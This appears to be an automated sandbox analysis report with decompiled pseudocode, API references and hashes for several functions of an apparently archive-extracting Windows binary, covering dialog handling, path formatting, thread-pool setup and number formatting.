0x0101a464
0x0101a4d7
0x0101a4d9
0x0101a4df
0x0101a4e2
0x00000000
0x0101a4e2
0x0101a469
0x0101a47d
0x00000000
0x0101a47d
0x0101a46e
0x0101a471
0x0101a4cd
0x0101a4d3
0x0101a4b7
0x0101a4b8
0x00000000
0x0101a4b8
0x0101a473
0x0101a476
0x0101a4b5
0x00000000
0x0101a4b5
0x0101a47b
0x0101a48a
0x0101a4a3
0x0101a4a8
0x0101a4aa
0x00000000
0x00000000
0x0101a4b1
0x00000000
0x0101a4b1
0x00000000

APIs

Part of subcall function 0100130B: GetDlgItem.USER32(00000000,00003021), ref: 0100134F
Part of subcall function 0100130B: SetWindowTextW.USER32(00000000,010335B4), ref: 01001365

EndDialog.USER32(?,00000001), ref: 0101A4B8
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0101A4CD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0101A4E2

Strings

ASKNEXTVOL, xrefs: 0101A448

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: ecd515a4e954ef2aadf4c5d44f72ad55457c00b753aa11e374ac78ba8fc01289
Instruction ID: 07e6106e0ad6651e66f4bfce806bb88e4044ed42a0768a2529718b3876d90f1b
Opcode Fuzzy Hash: ecd515a4e954ef2aadf4c5d44f72ad55457c00b753aa11e374ac78ba8fc01289
Instruction Fuzzy Hash: 67118732385344EFE6329F989D49F667BA9AB96750F040055F3C19B0ACCB6E9505C721

Uniqueness

Uniqueness Score: -1.00%

Function 0100D1C3, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0100D1C3(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E01011596( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E0100FDFB(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E0100DD6B();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t16 = _t46 + 0x18; // 0x63
					_t18 = _t46 + 0x14; // 0x3403c80
					_t30 = E010258D9(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E0100CFE0);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0x103e158 +  *_t30 * 0xc; // 0x10346b8
						E01025F40( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
					L1:
					_t31 = 0;
				}
				return _t31;
			}

0x0100d1c3
0x0100d1c3
0x0100d1c3
0x0100d1c4
0x0100d1c8
0x0100d1cf
0x0100d1d5
0x0100d1e5
0x0100d1eb
0x0100d1ef
0x0100d1f2
0x0100d1fd
0x0100d1fd
0x0100d205
0x0100d208
0x0100d243
0x0100d20a
0x0100d20a
0x0100d20d
0x0100d222
0x0100d223
0x00000000
0x0100d20f
0x0100d212
0x0100d217
0x0100d218
0x0100d228
0x0100d22b
0x0100d22d
0x0100d22e
0x0100d233
0x0100d233
0x0100d212
0x0100d20d
0x0100d24f
0x0100d255
0x0100d259
0x0100d263
0x00000000
0x0100d269
0x0100d26f
0x0100d278
0x0100d280
0x0100d280
0x0100d1d7
0x0100d1d7
0x0100d1d7
0x0100d1d7
0x0100d287

APIs

__fprintf_l.LIBCMT ref: 0100D22E
_strncpy.LIBCMT ref: 0100D278

Strings

$%s, xrefs: 0100D223
@%s, xrefs: 0100D218

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 65313b215a5f6d0db088ed8914eccff0f06e049f3108357be6913ea37f20e920
Instruction ID: f068e06119a1e6f86dc1b0004a75dd14789c516c55a0d5405df22c5e0a19b431
Opcode Fuzzy Hash: 65313b215a5f6d0db088ed8914eccff0f06e049f3108357be6913ea37f20e920
Instruction Fuzzy Hash: 2221A13240020DEAFB22DEE8CC45FEE7BECAF25310F040556FA909A191D771D648CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0101A990, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0101A990(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E0100130B(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E0100ECAD(_t24, 0x1056a78,  &_v260);
					E0100ECF8( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0101a99a
0x0101a99e
0x0101a9a2
0x0101a9bb
0x0101aa2a
0x00000000
0x0101aa2c
0x0101a9bd
0x0101a9c3
0x0101aa24
0x00000000
0x0101aa24
0x0101a9c8
0x0101a9d7
0x00000000
0x0101a9d7
0x0101a9cd
0x0101a9d0
0x0101a9f6
0x0101aa08
0x0101aa15
0x0101aa1a
0x0101a9dd
0x0101a9de
0x00000000
0x0101a9de
0x0101a9d5
0x0101a9db
0x00000000
0x0101a9db
0x00000000

APIs

Part of subcall function 0100130B: GetDlgItem.USER32(00000000,00003021), ref: 0100134F
Part of subcall function 0100130B: SetWindowTextW.USER32(00000000,010335B4), ref: 01001365

EndDialog.USER32(?,00000001), ref: 0101A9DE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0101A9F6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0101AA24

Strings

GETPASSWORD1, xrefs: 0101A9A9

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: ecb01052155217297f55e0eaaf132c9953d1fdd541b8dcb1e6be17b40511263f
Instruction ID: 1b30c044f99e26c95e8fdd82f71caf340ae0385ba845652a4268113bc0662413
Opcode Fuzzy Hash: ecb01052155217297f55e0eaaf132c9953d1fdd541b8dcb1e6be17b40511263f
Instruction Fuzzy Hash: FA114C33A41159FAEB3299689D08FFB3B6DEB49301F000051FBC5B7088C26A99958761

Uniqueness

Uniqueness Score: -1.00%

Function 0100B4F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0100B4F7(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				void* _t13;
				signed int _t14;
				short* _t20;
				void* _t23;
				signed short* _t27;
				signed int _t29;
				signed int _t31;

				_t20 = _a8;
				_t27 = _a4;
				 *_t20 = 0;
				_t10 = E0100B806(_t27);
				if(_t10 == 0) {
					_t29 = 0x5c;
					if( *_t27 == _t29 && _t27[1] == _t29) {
						_push(_t29);
						_push( &(_t27[2]));
						_t10 = E010215E8(__ecx);
						_pop(_t23);
						if(_t10 != 0) {
							_push(_t29);
							_push(_t10 + 2);
							_t13 = E010215E8(_t23);
							if(_t13 == 0) {
								_t14 = E010235B3(_t27);
							} else {
								_t14 = (_t13 - _t27 >> 1) + 1;
							}
							asm("sbb esi, esi");
							_t31 = _t29 & _t14;
							E01025842(_t20, _t27, _t31);
							_t10 = 0;
							 *((short*)(_t20 + _t31 * 2)) = 0;
						}
					}
					return _t10;
				}
				return E0100400A(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
			}

0x0100b4f8
0x0100b4ff
0x0100b504
0x0100b507
0x0100b50e
0x0100b52b
0x0100b52f
0x0100b53a
0x0100b53b
0x0100b53c
0x0100b542
0x0100b545
0x0100b54a
0x0100b54b
0x0100b54c
0x0100b555
0x0100b55f
0x0100b557
0x0100b55b
0x0100b55b
0x0100b569
0x0100b56b
0x0100b570
0x0100b578
0x0100b57a
0x0100b57a
0x0100b545
0x00000000
0x0100b57e
0x00000000

APIs

_swprintf.LIBCMT ref: 0100B51E

Part of subcall function 0100400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0100401D

_wcschr.LIBVCRUNTIME ref: 0100B53C
_wcschr.LIBVCRUNTIME ref: 0100B54C

Strings

%c:\, xrefs: 0100B514

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: ab0a711324d9ee95656d011f663db3cabccc8a6ef1aa4d55723ce0a6a2525659
Instruction ID: 37f1b3d942525333142686ad44d76cd30ddf749d3e1f7662906fea7531ef1ff8
Opcode Fuzzy Hash: ab0a711324d9ee95656d011f663db3cabccc8a6ef1aa4d55723ce0a6a2525659
Instruction Fuzzy Hash: 28016167504322BAF7326B799C41E6BB7ECDE65261F404496F9C4C70C0FE31D540C2A1

Uniqueness

Uniqueness Score: -1.00%

Function 010106BA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E010106BA(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x41] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0x1040f50);
					E01006E8C(E01006E91(_t19), 0x1040f50, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}

0x010106ba
0x010106ba
0x010106c2
0x010106c6
0x010106c7
0x010106cb
0x010106cd
0x010106cd
0x010106d6
0x010106d8
0x010106d8
0x010106da
0x010106e2
0x010106e4
0x010106e4
0x010106e6
0x010106ec
0x010106f3
0x01010707
0x0101070d
0x01010713
0x0101071f
0x01010725
0x0101072f
0x0101073b
0x0101073b
0x01010741
0x01010749
0x0101074f
0x01010758

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0100ABC5,00000008,?,00000000,?,0100CB88,?,00000000), ref: 010106F3
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0100ABC5,00000008,?,00000000,?,0100CB88,?,00000000), ref: 010106FD
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0100ABC5,00000008,?,00000000,?,0100CB88,?,00000000), ref: 0101070D

Strings

Thread pool initialization failed., xrefs: 01010725

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 25017019aa7c06e5fab9f1b26f5ebb3b038e46b3efb97e9c2b585b644cb34afc
Instruction ID: c20b2ad382f5bfd7db29a71a6eb50d1f582ee3f65845c13111b3251489f53d5e
Opcode Fuzzy Hash: 25017019aa7c06e5fab9f1b26f5ebb3b038e46b3efb97e9c2b585b644cb34afc
Instruction Fuzzy Hash: 8B1173B1500709AFD3315F69D8C4AA7FBECFB99755F204C2EF1DA86204D6766980CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0101D38B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0101D38B(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _t16;
				_Unknown_base(*)()* _t19;
				int _t22;

				 *0x105dc88 = _a12;
				 *0x105dc8c = _a16;
				 *0x1048464 = _a20;
				if( *0x1048460 == 0) {
					if( *0x1048453 == 0) {
						_t19 = E0101B8E0;
						_t16 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0x1040ed4, _t16,  *0x1048458, _t19, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0x1040ed0, L"RENAMEDLG",  *0x104844c, E0101CC90, _a4) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}

0x0101d398
0x0101d3a0
0x0101d3a8
0x0101d3ad
0x0101d3ba
0x0101d3c4
0x0101d3c9
0x0101d3f3
0x0101d40a
0x0101d40f
0x00000000
0x00000000
0x0101d3f1
0x00000000
0x00000000
0x0101d3f1
0x00000000
0x0101d415
0x00000000
0x0101d3be
0x00000000

Strings

RENAMEDLG, xrefs: 0101D3DE
REPLACEFILEDLG, xrefs: 0101D3C9, 0101D3FD

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: fab143105db0aee9d71e27bb3b208da83fbc2c8991e49ee22438a5e39b4be3ff
Instruction ID: 2003dbc1724221221365094ab9c48ea6662901c20a7a02095af6d81aa8cdde4a
Opcode Fuzzy Hash: fab143105db0aee9d71e27bb3b208da83fbc2c8991e49ee22438a5e39b4be3ff
Instruction Fuzzy Hash: 4901DDB5500245AFD7318FD9EE48E963FD9F744240B048426F5C1D211DD67F9850EB50

Uniqueness

Uniqueness Score: -1.00%

Function 010291DE, Relevance: 6.3, APIs: 4, Instructions: 305
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E010291DE(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E01023DD6(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E0101E4E0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E0101E4E0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E0101F350(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E0101E4E0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E0101E820();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E0101E820();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E0101E820();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E010294E1(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E01031B20(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E0102895A();
					_t183 = 0x22;
					 *_t129 = _t183;
					E01028839();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x010291de
0x010291e9
0x010291f0
0x010291f2
0x010291f2
0x010291f4
0x010291fd
0x010291ff
0x01029204
0x0102920a
0x01029220
0x01029225
0x01029228
0x01029235
0x0102923a
0x0102928e
0x01029296
0x01029298
0x0102929a
0x0102929d
0x0102929d
0x0102929d
0x010292a3
0x010292ab
0x010292be
0x010292c1
0x010292c3
0x010292c6
0x010292c7
0x010292e8
0x010292eb
0x010292eb
0x010292c9
0x010292c9
0x010292cb
0x010292d6
0x010292d6
0x010292d8
0x010292df
0x010292da
0x010292da
0x010292da
0x010292d8
0x010292ec
0x010292ee
0x010292ef
0x010292f2
0x010292f4
0x010292fe
0x01029308
0x010292f6
0x010292f6
0x010292f6
0x0102930d
0x0102930d
0x01029312
0x01029315
0x01029320
0x01029320
0x01029320
0x01029320
0x01029324
0x0102932b
0x0102932c
0x0102932f
0x01029332
0x01029332
0x01029334
0x00000000
0x00000000
0x0102934c
0x01029353
0x01029357
0x0102935a
0x0102935d
0x0102935f
